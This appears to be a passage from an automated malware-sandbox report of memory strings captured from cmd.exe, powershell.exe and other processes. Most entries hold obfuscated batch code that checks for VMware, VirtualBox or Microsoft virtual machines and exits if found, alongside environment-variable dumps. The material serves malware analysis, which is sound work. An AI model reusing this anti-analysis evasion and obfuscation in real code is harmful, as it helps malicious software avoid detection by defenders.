Source: cmd.exe, 0000000B.00000003.1424505875.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=o0
Source: cmd.exe, 0000000B.00000003.1440918733.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=Os;PATH
Source: cvtres.exe, 00000020.00000002.1489212522.0000021DA009F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%pRRskkyxH%TxdoRBmbqzyDVqyq%PgoZqotPpEsJcYkgv%oIMCIYPcwKpRXwK%hZOpTayxjdmkYSTjwD%isoMMZLfuBkSCvSyyG%qCQhJEFampksrwfrH%CijJlvWCTruCJCKdl%fqmJILLziDUrkvnqn%kmYFUdkjVrRsAkRgE%ObkWUkGgYulxXHBAg%oRwulXKHtPlwIBGZgl%urTGZNVgFfZlhAgG%CRTkCOGlG%"=="Microsoft Corporation" if "%qZeNCZQ%wmXNiBYbPdfGrqJTw%zryaeCiiDdiFTXMmAh%QVIQwReasfWDTDlvM%AgRBROmTOtYYoineiSN%dYnsVHrFmacxxSXvQ%tWLEIVCk%"=="Virtual Machine" exit\nif "%xRBQinlJp%mbrgPxxAzbmdwePzaaH%MmGCkpHprbHzNBCL%mfpYqPqngcewVYgCrL%YPqZvLxjPlulEQkM%foIJfWFnRubkbHmJkS%pScwvjKLppAAsqLazCm%nslqyZxurJOtEixMMO%MbqOKcliRtUghUY%AWjPTCANrjVNHgbGQ%zMexKLWbgIYRTWUrvB%nXCkplftFHEScSuGg%SQDhLiegIuuTSdV%FhVxegw%"=="VMware, Inc." exit\nif "%OsDKwVzNU%SVsXrnjRzbMMdThZlMy%zOYvoUadunZYwHaL%rBEfReLkosoYRBCab%rOfxBNztkqwXodCsi%dDBvtrKaarMepAQw%xEkHLwXz%"=="VirtualBox" exit
Source: cmd.exe, 0000000B.00000003.1421962374.000002C1DCA56000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=o
Source: cmd.exe, 0000000B.00000003.1425447787.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=o5
Source: cmd.exe, 0000000B.00000003.1440215461.000002C1DCA52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: xit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=O
Source: cmd.exe, 0000000B.00000003.1423336848.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=oZZ
Source: cvtres.exe, 00000020.00000002.1489088205.0000021DA0050000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%pRRskkyxH%TxdoRBmbqzyDVqyq%PgoZqotPpEsJcYkgv%oIMCIYPcwKpRXwK%hZOpTayxjdmkYSTjwD%isoMMZLfuBkSCvSyyG%qCQhJEFampksrwfrH%CijJlvWCTruCJCKdl%fqmJILLziDUrkvnqn%kmYFUdkjVrRsAkRgE%ObkWUkGgYulxXHBAg%oRwulXKHtPlwIBGZgl%urTGZNVgFfZlhAgG%CRTkCOGlG%"=="Microsoft Corporation" if "%qZeNCZQ%wmXNiBYbPdfGrqJTw%zryaeCiiDdiFTXMmAh%QVIQwReasfWDTDlvM%AgRBROmTOtYYoineiSN%dYnsVHrFmacxxSXvQ%tWLEIVCk%"=="Virtual Machine" exit\nif "%xRBQinlJp%mbrgPxxAzbmdwePzaaH%MmGCkpHprbHzNBCL%mfpYqPqngcewVYgCrL%YPqZvLxjPlulEQkM%foIJfWFnRubkbHmJkS%pScwvjKLppAAsqLazCm%nslqyZxurJOtEixMMO%MbqOKcliRtUghUY%AWjPTCANrjVNHgbGQ%zMexKLWbgIYRTWUrvB%nXCkplftFHEScSuGg%SQDhLiegIuuTSdV%FhVxegw%"=="VMware, Inc." exit\nif "%OsDKwVzNU%SVsXrnjRzbMMdThZlMy%zOYvoUadunZYwHaL%rBEfReLkosoYRBCab%rOfxBNztkqwXodCsi%dDBvtrKaarMepAQw%xEkHLwXz%"=="VirtualBox" exit n=cn1=Cnumber_of_processors=2o=do1=Donedrive=C:\Users\user\OneDriveos=Windows_NTp=ep1=Epath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;pathext=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLprocessor_architecture=AMD64processor_identifier=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelprocessor_level=6processor_revision=8f08programdata=C:\ProgramDataprogramfiles=C:\Program Filesprogramfiles(x86)=C:\Program Files (x86)programw6432=C:\Program Filesprompt=$P$Gpsexecutionpolicypreference=Bypasspsmodulepath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXpublic=C:\Users\Publicq=fq1=Fr=gr1=Gs=hs1=Hsessionname=Consolesystemdrive=C:systemroot=C:\Windowst=it1=Itemp=C:\Users\user~1\AppData\Local\Temptmp=C:\Users\user~1\AppData\Local\Tempu=ju1=Juserdomain=user-PCuserdomain_roamingprofile=user-PCusername=useruserprofile=C:\Users\userv=kv1=Kw=lw1=Lwindir=C:\Windowsx=mx1=My=ny1=Nz=oz1=O_clrrestrictsecattributes=1{
Source: powershell.exe, 00000029.00000002.1870747846.000000C0000A8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: \nif "%pRRskkyxH%TxdoRBmbqzyDVqyq%PgoZqotPpEsJcYkgv%oIMCIYPcwKpRXwK%hZOpTayxjdmkYSTjwD%isoMMZLfuBkSCvSyyG%qCQhJEFampksrwfrH%CijJlvWCTruCJCKdl%fqmJILLziDUrkvnqn%kmYFUdkjVrRsAkRgE%ObkWUkGgYulxXHBAg%oRwulXKHtPlwIBGZgl%urTGZNVgFfZlhAgG%CRTkCOGlG%"=="Microsoft Corporation" if "%qZeNCZQ%wmXNiBYbPdfGrqJTw%zryaeCiiDdiFTXMmAh%QVIQwReasfWDTDlvM%AgRBROmTOtYYoineiSN%dYnsVHrFmacxxSXvQ%tWLEIVCk%"=="Virtual Machine" exit\nif "%xRBQinlJp%mbrgPxxAzbmdwePzaaH%MmGCkpHprbHzNBCL%mfpYqPqngcewVYgCrL%YPqZvLxjPlulEQkM%foIJfWFnRubkbHmJkS%pScwvjKLppAAsqLazCm%nslqyZxurJOtEixMMO%MbqOKcliRtUghUY%AWjPTCANrjVNHgbGQ%zMexKLWbgIYRTWUrvB%nXCkplftFHEScSuGg%SQDhLiegIuuTSdV%FhVxegw%"=="VMware, Inc." exit\nif "%OsDKwVzNU%SVsXrnjRzbMMdThZlMy%zOYvoUadunZYwHaL%rBEfReLkosoYRBCab%rOfxBNztkqwXodCsi%dDBvtrKaarMepAQw%xEkHLwXz%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=O=::=::\=C:=C:\Users\user\Desktop=ExitCode=00000000a=pA1=PALLUSERSPROFILE=C:\ProgramDataans=835122APPDATA=C:\Users\user\AppData\Roamingb=qB1=Qc=rC1=RCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exed=sD1=SDriverData=C:\Windows\System32\Drivers\DriverDatae=tE1=Tf=uF1=UFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=Defaultg=vG1=Vh=wH1=WHOMEDRIVE=C:HOMEPATH=\Users\useri=xI1=Xj=yJ1=Yk=zK1=ZKDOT=GkvsNxWVwqgRFfnZdyui297TIpYMQb8XaEBtmJ4LeSorh5CPOKD3UHA0czlj61 l=aL1=ALOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCm=bM1=Bmanufacturer=%MGubyRKD%YrqpSyKTslhbH6rKmFa 158
Source: taskkill.exe, 0000004D.00000002.1779424801.000002146F254000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: "%xRBQinlJp%mbrgPxxAzbmdwePzaaH%MmGCkpHprbHzNBCL%mfpYqPqngcewVYgCrL%YPqZvLxjPlulEQkM%foIJfWFnRubkbHmJkS%pScwvjKLppAAsqLazCm%nslqyZxurJOtEixMMO%MbqOKcliRtUghUY%AWjPTCANrjVNHgbGQ%zMexKLWbgIYRTWUrvB%nXCkplftFHEScSuGg%SQDhLiegIuuTSdV%FhVxegw%"=="VMware, Inc." exit\nif "%OsDKwVzNU%SVsXrnjRzbMMdThZlMy%zOYvoUadunZYwHaL%rBEfReLkosoYRBCab%rOfxBNztkqwXodCsi%dDBvtrKaarMepAQw%xEkHLwXz%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAN
